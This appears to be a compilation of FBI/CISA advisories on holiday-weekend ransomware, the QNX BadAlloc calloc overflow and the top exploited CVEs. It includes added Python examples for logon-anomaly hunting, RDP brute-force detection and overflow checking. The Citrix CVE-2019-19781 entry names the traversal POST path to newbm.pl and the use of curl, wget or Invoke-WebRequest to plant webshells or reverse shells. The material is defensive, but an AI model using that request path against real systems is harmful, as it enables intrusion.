Ransomware Awareness for Holidays and Weekends


Immediate Actions You Can Take Now to Protect Against Ransomware
• Make an offline backup of your data.
• Do not click on suspicious links.
• If you use RDP, secure and monitor it.
• Update your OS and software.
• Use strong passwords.
• Use multi-factor authentication.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends—when offices are normally closed—in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information to provide awareness to be especially diligent in your network defense practices in the run up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.


Threat Overview

Recent Holiday Targeting

Cyber actors have conducted increasingly impactful attacks against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. Cyber criminals, however, may view holidays and weekends—especially holiday weekends—as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.

  • In May 2021, leading into Mother’s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim’s network, they deployed ransomware to encrypt victim data and—as a secondary form of extortion—exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.
  • In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.
  • In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations—including multiple managed service providers and their customers.

Ransomware Trends

The FBI’s Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received 791,790 complaints for all types of internet crime—a record number—from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in the number of incidents, and a 225 percent increase in ransom demands. From January to July 31, 2021, the IC3 has received 2,084 ransomware complaints with over $16.8M in losses, a 62 percent increase in reporting and 20 percent increase in reported losses compared to the same time frame in 2020.
The following ransomware variants have been the most frequently reported to the FBI in attacks over the last month.

  • Conti
  • PYSA
  • LockBit
  • RansomEXX/Defray777
  • Zeppelin
  • Crysis/Dharma/Phobos

The destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA’s Fact Sheet: Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches.) Malicious actors have also added tactics, such as encrypting or deleting system backups—making restoration and recovery more difficult or infeasible for impacted organizations.

Although cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: 

  • Evaluate a victim’s ability to pay a ransom.
  • Evaluate a victim’s incentive to pay a ransom to: 
    • Regain access to their data and/or 
    • Avoid having their sensitive or proprietary data publicly leaked.
  • Gather information for follow-on attacks before deploying ransomware on the victim network.

Threat Hunting

The FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements: understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems.

  • Understand the IT environment’s routine activity and architecture by establishing a baseline. By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. This approach can help an organization remain alert on deviations from normal activity and detect anomalies. Understanding when users log in to the network—and from what location—can assist in identifying anomalies. Understanding the baseline environment—including the normal internal and external traffic—can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.
  • Review data logs. Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include:
    • Numerous failed file modifications,
    • Increased CPU and disk activity,
    • Inability to access certain files, and
    • Unusual network communications.
  • Employ intrusion prevention systems and automated security alerting systems—such as security information event management software, intrusion detection systems, and endpoint detection and response.
  • Deploy honeytokens and alert on their usage to detect lateral movement.

Indicators of suspicious activity that threat hunters should look for include:

  • Unusual inbound and outbound network traffic,
  • Compromise of administrator privileges or escalation of the permissions on an account,
  • Theft of login and password credentials,
  • Substantial increase in database read volume,
  • Geographical irregularities in access and log in patterns,
  • Attempted user activity during anomalous logon times, 
  • Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and
  • Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.
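The baseline-and-deviation approach described above (routine logon hours and locations per user, then alerting on geographical irregularities and anomalous logon times, with extra attention to weekends and holidays) can be expressed as a small hunting script. The following Python is an added example, not code from the advisory or from the FBI/CISA: the logon events, user names, countries and the holiday calendar are all constructed for the illustration, and the one-hour slack around each baseline hour is an assumed tuning value.

```python
from collections import defaultdict
from datetime import date, datetime

# Constructed logon events (user, local timestamp, source country); not real data.
# A baseline window of ordinary weekday activity ...
BASELINE_EVENTS = [
    ("alice", "2021-08-02T08:05:00", "US"),
    ("alice", "2021-08-03T08:12:00", "US"),
    ("alice", "2021-08-04T09:01:00", "US"),
    ("alice", "2021-08-05T08:47:00", "US"),
    ("alice", "2021-08-06T17:30:00", "US"),
    ("bob", "2021-08-02T22:10:00", "US"),
    ("bob", "2021-08-03T23:05:00", "US"),
    ("bob", "2021-08-04T22:40:00", "US"),
]

# ... and the events to hunt through around the (assumed) Labor Day weekend.
NEW_EVENTS = [
    ("alice", "2021-09-01T08:10:00", "US"),  # ordinary weekday morning logon
    ("alice", "2021-09-05T03:15:00", "RO"),  # Sunday, 03:15, never-seen country
    ("bob", "2021-09-06T22:30:00", "US"),    # holiday, but bob's usual late shift
    ("bob", "2021-09-03T11:00:00", "US"),    # weekday, far outside bob's usual hours
]

HOLIDAYS = {date(2021, 9, 6)}  # assumed organizational holiday calendar


def build_baseline(events):
    """Per-user set of logon hours and source countries seen during the baseline window."""
    hours, countries = defaultdict(set), defaultdict(set)
    for user, ts, country in events:
        t = datetime.fromisoformat(ts)
        hours[user].add(t.hour)
        countries[user].add(country)
    return {"hours": dict(hours), "countries": dict(countries)}


def hour_in_baseline(hour, known_hours, slack=1):
    """True if the hour is within `slack` hours of any hour the user normally logs on."""
    return any(abs(hour - h) <= slack for h in known_hours)


def hunt(events, baseline, holidays):
    """Return (user, timestamp, reasons) for every event that deviates from the baseline
    or falls on a weekend/holiday, when defenders are least likely to be watching."""
    findings = []
    for user, ts, country in events:
        t = datetime.fromisoformat(ts)
        reasons = []
        known_hours = baseline["hours"].get(user, set())
        if not known_hours:
            reasons.append("no baseline for user")
        elif not hour_in_baseline(t.hour, known_hours):
            reasons.append(f"logon hour {t.hour:02d} outside baseline")
        if country not in baseline["countries"].get(user, set()):
            reasons.append(f"new source country {country}")
        if t.weekday() >= 5:
            reasons.append("weekend logon")
        if t.date() in holidays:
            reasons.append("holiday logon")
        if reasons:
            findings.append((user, ts, reasons))
    return findings


if __name__ == "__main__":
    for user, ts, reasons in hunt(NEW_EVENTS, build_baseline(BASELINE_EVENTS), HOLIDAYS):
        print(f"{ts} {user}: {'; '.join(reasons)}")
```

Run against the constructed data, the script stays quiet on alice's ordinary Wednesday logon, flags her Sunday 03:15 logon from a new country on three counts, flags bob's Labor Day logon only because of the date (his hour is normal, so it is a low-priority item), and flags his 11:00 weekday logon purely on the hour deviation. In production the baseline would be built from weeks of authentication logs and the per-user reasons would feed a SIEM rule rather than a print loop.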

See the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

Cyber Hygiene Services

CISA offers a range of no-cost cyber hygiene services—including vulnerability scanning and ransomware readiness assessments—to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. 

Ransomware Best Practices

The FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to CISA, a local FBI field office, or by filing a report with IC3 at IC3.gov. Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. law, and share information to prevent future attacks.

Information Requested

Upon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: 

  • Recovered executable file(s),
  • Live memory (RAM) capture,
  • Images of infected systems,
  • Malware samples, and
  • Ransom note.

Recommended Mitigations

The FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends. Additionally, the FBI and CISA recommend identifying IT security employees to be available and “on call” during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.

Make an offline backup of your data.

  • Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.
  • Review your organization’s backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.

Do not click on suspicious links.

  • Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.

If you use RDP—or other potentially risky services—secure and monitor.

  • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.
  • Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.
  • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). 
  • Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.
  • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Open document readers in protected viewing modes to help prevent active content from running.
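The second bullet above (monitor RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts) is the control that counters the brute-forcing of exposed RDP endpoints named earlier as one of the two most common initial access vectors. The following Python is an added example, not from the advisory: it runs a sliding-window failure counter over constructed RDP authentication events, raises an alert when an account crosses an assumed lockout threshold, and raises a higher-priority alert if a success follows the threshold, which means either the lockout is not being enforced or the guessed credential was valid. On a Windows host the equivalent feed would be Security events 4625 (failed logon) and 4624 (successful logon) with logon type 10; the event tuples here are constructed, and the window and threshold are assumed policy values.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # assumed lockout observation window
LOCKOUT_THRESHOLD = 5           # assumed policy: 5 failures within WINDOW locks the account

# Constructed, time-ordered RDP authentication events: (timestamp, source IP, account, outcome).
RDP_EVENTS = [
    ("2021-09-04T02:00:01", "198.51.100.7", "administrator", "fail"),
    ("2021-09-04T02:00:03", "198.51.100.7", "administrator", "fail"),
    ("2021-09-04T02:00:05", "198.51.100.7", "administrator", "fail"),
    ("2021-09-04T02:00:07", "198.51.100.7", "administrator", "fail"),
    ("2021-09-04T02:00:09", "198.51.100.7", "administrator", "fail"),
    ("2021-09-04T02:00:12", "198.51.100.7", "administrator", "success"),
    ("2021-09-04T09:30:00", "10.0.0.12", "alice", "fail"),      # a mistyped password
    ("2021-09-04T09:30:20", "10.0.0.12", "alice", "success"),
    ("2021-09-04T10:00:00", "10.0.0.12", "alice", "fail"),
    ("2021-09-04T10:20:00", "10.0.0.12", "alice", "fail"),      # 20 min apart: window expires
]


def analyze_rdp(events, window=WINDOW, threshold=LOCKOUT_THRESHOLD):
    """Return (alerts, locked_accounts). alerts is a list of
    (kind, source_ip, account, timestamp) tuples in the order they fired."""
    failures = defaultdict(deque)   # account -> timestamps of recent failed attempts
    locked = set()
    alerts = []
    for ts, src, user, outcome in events:
        t = datetime.fromisoformat(ts)
        q = failures[user]
        # Drop failures that fell out of the sliding window.
        while q and t - q[0] > window:
            q.popleft()
        if outcome == "fail":
            q.append(t)
            if len(q) >= threshold and user not in locked:
                locked.add(user)
                alerts.append(("brute-force", src, user, ts))
        elif outcome == "success":
            if user in locked:
                # A lockout should have made this impossible; page the on-call engineer.
                alerts.append(("success-after-threshold", src, user, ts))
            q.clear()   # a legitimate success resets the failure streak
    return alerts, locked


if __name__ == "__main__":
    alerts, locked = analyze_rdp(RDP_EVENTS)
    for kind, src, user, ts in alerts:
        print(f"{ts} {kind}: account={user} source={src}")
    print("accounts to lock:", sorted(locked))
```

Alice's scattered failures never accumulate five inside the window and produce nothing, while the burst against `administrator` at 02:00 on a Saturday trips the threshold on the fifth attempt and then escalates when the sixth attempt succeeds. The same counter keyed on source IP instead of account would surface password spraying, where each account sees only one or two failures.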

Update your OS and software; scan for vulnerabilities.

  • Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers—as well as software processing internet data, such as web browsers, browser plugins, and document readers—for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.
  • Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.
  • Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA’s free services.)

Use strong passwords.

  • Ensure strong passwords and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.

Use multi-factor authentication.

  • Require multi-factor authentication (MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. 

Secure your network(s): implement segmentation, filter traffic, and scan ports.

  • Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.
  • Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
  • Scan network for open and listening ports and close those that are unnecessary.
  • For companies with employees working remotely, secure home networks—including computing, entertainment, and Internet of Things devices—to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content. 

Secure your user accounts.

  • Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.
  • Regularly audit logs to ensure new accounts are legitimate users.

Have an incident response plan.

  • Create, maintain, and exercise a basic cyber incident response plan that:
    • Includes procedures for response and notification in a ransomware incident and
    • Plans for the possibility of critical systems being inaccessible for a period of time.

Note: for help with developing your plan, review available incident response guidance, such as the Public Power Cyber Incident Response Playbook and the Ransomware Response Checklist in the CISA-MS-ISAC Joint Ransomware Guide.

If your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.

  • Isolate the infected system. Remove the infected system from all networks, and disable the computer’s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless.
  • Turn off other computers and devices. Power off and segregate (i.e., remove from the network) the infected computer(s). Power off and segregate any other computers or devices that share a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering off and segregating infected computers from computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists.
  • Secure your backups. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.

Additional Resources

For additional resources related to the prevention and mitigation of ransomware, go to https://www.stopransomware.gov as well as the CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide. Stopransomware.gov is the U.S. Government’s new, official one-stop location for resources to tackle ransomware more effectively. Additional resources include:


BadAlloc Vulnerability Affecting BlackBerry QNX RTOS


On August 17, 2021, BlackBerry publicly disclosed that its QNX Real Time Operating System (RTOS) is affected by a BadAlloc vulnerability—CVE-2021-22156. BadAlloc is a collection of vulnerabilities affecting multiple RTOSs and supporting libraries.[1] A remote attacker could exploit CVE-2021-22156 to cause a denial-of-service condition or execute arbitrary code on affected devices.[2] BlackBerry QNX RTOS is used in a wide range of products whose compromise could result in a malicious actor gaining control of highly sensitive systems, increasing risk to the Nation’s critical functions. Note: at this time, CISA is not aware of active exploitation of this vulnerability.

CISA strongly encourages critical infrastructure organizations and other organizations developing, maintaining, supporting, or using affected QNX-based systems to patch affected products as quickly as possible. Refer to the Mitigations section for more information about patching.

CVE-2021-22156 is an integer overflow vulnerability affecting the calloc() function in the C runtime library of multiple BlackBerry QNX products. Exploitation of this vulnerability could lead to a denial-of-service condition or arbitrary code execution in affected devices. To exploit this vulnerability, an attacker must have control over the parameters to a calloc() function call and the ability to control what memory is accessed after the allocation. An attacker with network access could remotely exploit this vulnerability if the vulnerable product is running and the affected device is exposed to the internet.[3]
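To make the calloc() arithmetic concrete, here is an added Python model; it is not QNX or BlackBerry code, and the page gives no QNX internals. It reproduces the unsigned wrap-around of nmemb * size at an assumed 32-bit size_t, shows the overflow check a corrected allocator applies before multiplying, and runs a small audit over constructed (nmemb, size) call sites to show how a wrapped product leaves a buffer far smaller than the caller believes it has. The width and the call sites are assumptions for the illustration.

```python
SIZE_MAX_32 = 2**32 - 1   # assumed 32-bit size_t, typical of many embedded targets
SIZE_MAX_64 = 2**64 - 1

# Constructed call sites (nmemb, size): a benign one and one whose product wraps at 32 bits.
CALL_SITES = [(256, 16), (0x40000001, 4)]


def unchecked_request(nmemb, size, size_max=SIZE_MAX_32):
    """Bytes an allocator actually reserves if it multiplies nmemb * size with no check:
    C unsigned arithmetic wraps modulo (size_max + 1)."""
    return (nmemb * size) & size_max


def checked_request(nmemb, size, size_max=SIZE_MAX_32):
    """Overflow-safe sizing. The division test is the standard idiom a fixed calloc uses:
    nmemb * size fits in size_t exactly when nmemb <= size_max // size.
    Returns None where calloc should refuse the request and return NULL."""
    if nmemb == 0 or size == 0:
        return 0
    if nmemb > size_max // size:
        return None
    return nmemb * size


def audit_call_sites(calls, size_max=SIZE_MAX_32):
    """Flag call sites where the unchecked product wraps; 'shortfall' is how many bytes
    the caller may write past the end of the buffer it was actually given."""
    findings = []
    for nmemb, size in calls:
        expected = nmemb * size
        reserved = unchecked_request(nmemb, size, size_max)
        if reserved != expected:
            findings.append({"nmemb": nmemb, "size": size, "reserved": reserved,
                             "shortfall": expected - reserved})
    return findings


if __name__ == "__main__":
    for f in audit_call_sites(CALL_SITES):
        print(f"calloc({f['nmemb']:#x}, {f['size']}) wraps to {f['reserved']} bytes "
              f"(shortfall {f['shortfall']} bytes)")
```

With the constructed second call site, 0x40000001 elements of 4 bytes multiply to 0x100000004, which a 32-bit size_t truncates to 4: the unchecked allocator hands back a 4-byte buffer for what the caller treats as a 4 GiB array, while the checked version rejects the request outright. This is why the advisory's precondition matters: an attacker needs to influence the calloc() parameters, and the patch closes the gap by refusing any product that cannot fit.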

CVE-2021-22156 is part of a collection of integer overflow vulnerabilities, known as BadAlloc, which affect a wide range of industries using Internet of Things (IoT), and operational technology (OT)/industrial control systems (ICS) devices. See CISA ICS Advisory ICSA-21-119-04 and Microsoft’s BadAlloc blog post for more information.

All BlackBerry programs with dependency on the C runtime library are affected by this vulnerability (see table 1 for a list of affected BlackBerry QNX products). Because many affected devices include safety-critical devices, exploitation of this vulnerability could result in a malicious actor gaining control of sensitive systems, possibly leading to increased risk of damage to infrastructure or critical functions.

Table 1: Affected BlackBerry QNX Products [4]

Product                                  Affected Version
QNX SDP                                  6.5.0SP1, 6.5.0, 6.4.1, 6.4.0
QNX Momentics Development Suite          6.3.2
QNX Momentics                            6.3.0SP3, 6.3.0SP2, 6.3.0SP1, 6.3.0, 6.2.1b, 6.2.1, 6.2.1A, 6.2.0
QNX Realtime Platform                    6.1.0a, 6.1.0, 6.0.0a, 6.0.0
QNX Cross Development Kit                6.0.0, 6.1.0
QNX Development Kit (Self-hosted)        6.0.0, 6.1.0
QNX Neutrino RTOS Safe Kernel            1.0
QNX Neutrino RTOS Certified Plus         1.0
QNX Neutrino RTOS for Medical Devices    1.0, 1.1
QNX OS for Automotive Safety             1.0
QNX OS for Safety                        1.0, 1.0.1
QNX Neutrino Secure Kernel               6.4.0, 6.5.0
QNX CAR Development Platform             2.0RR

Mitigations

CISA strongly encourages critical infrastructure organizations and other organizations developing, maintaining, supporting, or using affected QNX-based systems to patch affected products as quickly as possible.

  • Manufacturers of products that incorporate vulnerable versions should contact BlackBerry to obtain the patch.
  • Manufacturers of products who develop unique versions of RTOS software should contact BlackBerry to obtain the patch code. Note: in some cases, manufacturers may need to develop and test their own software patches.
  • End users of safety-critical systems should contact the manufacturer of their product to obtain a patch. If a patch is available, users should apply the patch as soon as possible. If a patch is not available, users should apply the manufacturer’s recommended mitigation measures until the patch can be applied.
    • Note: installing software updates on an RTOS may frequently require taking the device out of service or moving it to an off-site location for physical replacement of integrated memory.

Resources


Top Routinely Exploited Vulnerabilities | CISA


This Joint Cybersecurity Advisory was coauthored by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom’s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI). 

This advisory provides details on the top 30 vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—routinely exploited by malicious cyber actors in 2020 and those being widely exploited thus far in 2021.  

Cyber actors continue to exploit publicly known—and often dated—software vulnerabilities against broad target sets, including public and private sector organizations worldwide. However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system. 


Key Findings

In 2020, cyber actors readily exploited recently disclosed vulnerabilities to compromise unpatched systems. Based on available data to the U.S. Government, a majority of the top vulnerabilities targeted in 2020 were disclosed during the past two years. Cyber actor exploitation of more recently disclosed software flaws in 2020 probably stems, in part, from the expansion of remote work options amid the COVID-19 pandemic. The rapid shift and increased use of remote work options, such as virtual private networks (VPNs) and cloud-based environments, likely placed additional burden on cyber defenders struggling to maintain and keep pace with routine software patching.

Four of the most targeted vulnerabilities in 2020 affected remote work, VPNs, or cloud-based technologies. Many VPN gateway devices remained unpatched during 2020, with the growth of remote work options challenging the ability of organizations to conduct rigorous patch management.

CISA, ACSC, the NCSC, and FBI consider the vulnerabilities listed in table 1 to be the topmost regularly exploited CVEs by cyber actors during 2020. 

Table 1: Top Routinely Exploited CVEs in 2020

Vendor        CVE              Type
Citrix        CVE-2019-19781   arbitrary code execution
Pulse         CVE-2019-11510   arbitrary file reading
Fortinet      CVE-2018-13379   path traversal
F5 Big-IP     CVE-2020-5902    remote code execution (RCE)
MobileIron    CVE-2020-15505   RCE
Microsoft     CVE-2017-11882   RCE
Atlassian     CVE-2019-11580   RCE
Drupal        CVE-2018-7600    RCE
Telerik       CVE-2019-18935   RCE
Microsoft     CVE-2019-0604    RCE
Microsoft     CVE-2020-0787    elevation of privilege
Netlogon      CVE-2020-1472    elevation of privilege

In 2021, malicious cyber actors continued to target vulnerabilities in perimeter-type devices. Among those highly exploited in 2021 are vulnerabilities in Microsoft, Pulse, Accellion, VMware, and Fortinet.

CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. 

Organizations are encouraged to remediate or mitigate vulnerabilities as quickly as possible to reduce the risk of exploitation. Most can be remediated by patching and updating systems. Organizations that have not remediated these vulnerabilities should investigate for the presence of IOCs and, if compromised, initiate incident response and recovery plans. See the Contact Information section below for how to reach CISA to report an incident or request technical assistance.

2020 CVEs

CISA, ACSC, the NCSC, and FBI have identified the following as the topmost exploited vulnerabilities by malicious cyber actors from 2020: CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2020-5902, CVE-2020-15505, CVE-2020-0688, CVE-2019-3396, CVE-2017-11882, CVE-2019-11580, CVE-2018-7600, CVE-2019-18935, CVE-2019-0604, CVE-2020-0787, CVE-2020-1472.[1][2][3] Among these vulnerabilities, CVE-2019-19781 was the most exploited flaw in 2020, according to U.S. Government technical analysis. CVE-2019-19781 is a recently disclosed critical vulnerability in Citrix’s Application Delivery Controller (ADC)—a load balancing application for web, application, and database servers widely used throughout the United States.[4][5] Nation-state and criminal cyber actors most likely favor using this vulnerability because it is easy to exploit, Citrix servers are widespread, and exploitation enables the actors to perform unauthorized RCE on a target system.[6]

Identified as emerging targets in early 2020,[7] unremediated instances of CVE-2019-19781 and CVE-2019-11510 continued to be exploited throughout the year by nation-state advanced persistent threat actors (APTs) who leveraged these and other vulnerabilities, such as CVE-2018-13379[8][9], in VPN services[10][11] to compromise an array of organizations, including those involved in COVID-19 vaccine development.[12][13]

The CVE-2019-11510 vulnerability in Pulse Connect Secure VPN was also frequently targeted by nation-state APTs. Actors can exploit the vulnerability to steal the unencrypted credentials for all users on a compromised Pulse VPN server and can retain unauthorized access after the system is patched unless all compromised credentials are changed. Nation-state APTs also commonly exploited CVE-2020-15505 and CVE-2020-5902.[14][15][16][17]

2021 CVEs

In 2021, cyber actors continued to target vulnerabilities in perimeter-type devices. In addition to the 2020 CVEs listed above, organizations should prioritize patching for the following CVEs known to be exploited. 

  • Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 
    • See CISA’s Alert: Mitigate Microsoft Exchange Server Vulnerabilities for more information on identifying and mitigating malicious activity concerning these vulnerabilities.
  • Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900
    • See CISA’s Alert: Exploitation of Pulse Connect Secure Vulnerabilities for more information on how to investigate and mitigate this malicious activity.
  • Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104
    • See the Australia-New Zealand-Singapore-UK-U.S. Joint Cybersecurity Advisory: Exploitation of Accellion File Transfer Appliance for technical details and mitigations.
  • VMware: CVE-2021-21985
    • See CISA’s Current Activity: Unpatched VMware vCenter Software for more information and guidance. 
  • Fortinet: CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 
    • See the CISA-FBI Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks for more details and mitigations. 

Mitigations and Indicators of Compromise

One of the most effective best practices to mitigate many vulnerabilities is to update software versions once patches are available and as soon as is practicable. If this is not possible, consider applying temporary workarounds or other mitigations, if provided by the vendor. If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems). This advisory highlights vulnerabilities that should be considered as part of the prioritization process. To further assist remediation, automatic software updates should be enabled whenever possible. 

Focusing scarce cyber defense resources on patching those vulnerabilities that cyber actors most often use offers the potential of bolstering network security while impeding our adversaries’ operations. For example, nation-state APTs in 2020 extensively relied on a single RCE vulnerability discovered in Atlassian Crowd, a centralized identity management application (CVE-2019-11580), in their reported operations. A concerted focus on patching this vulnerability could have a relatively broad impact by forcing the actors to find alternatives, which may not have the same broad applicability to their target set.

Additionally, attackers commonly exploit weak authentication processes, particularly in external-facing devices. Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.

Tables 2–14 provide more details about, and specific mitigations for, each of the top exploited CVEs in 2020. 

Note: The lists of associated malware corresponding to each CVE below are not meant to be exhaustive but intended to identify a malware family commonly associated with exploiting the CVE.

Table 2: CVE-2019-19781 Vulnerability Details

Citrix Netscaler Directory Traversal (CVE-2019-19781)

Vulnerability Description
Citrix Netscaler Application Delivery Control (ADC) is vulnerable to RCE and full system compromise due to poor access controls, thus allowing directory traversal. 

CVSS 3.02 

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

The lack of adequate access controls allows an attacker to enumerate system directories for vulnerable code (directory traversal). In this instance, Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request (POST https://$TARGET/vpn/../vpn/portal/scripts/newbm.pl), allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software (webshell or reverse-shell executable) using embedded commands (e.g., curl, wget, Invoke-WebRequest) and gain unauthorized access to the OS. 

Multiple malware campaigns, including NOTROBIN, have taken advantage of this vulnerability.

Fix

Patch Available

Recommended Mitigations

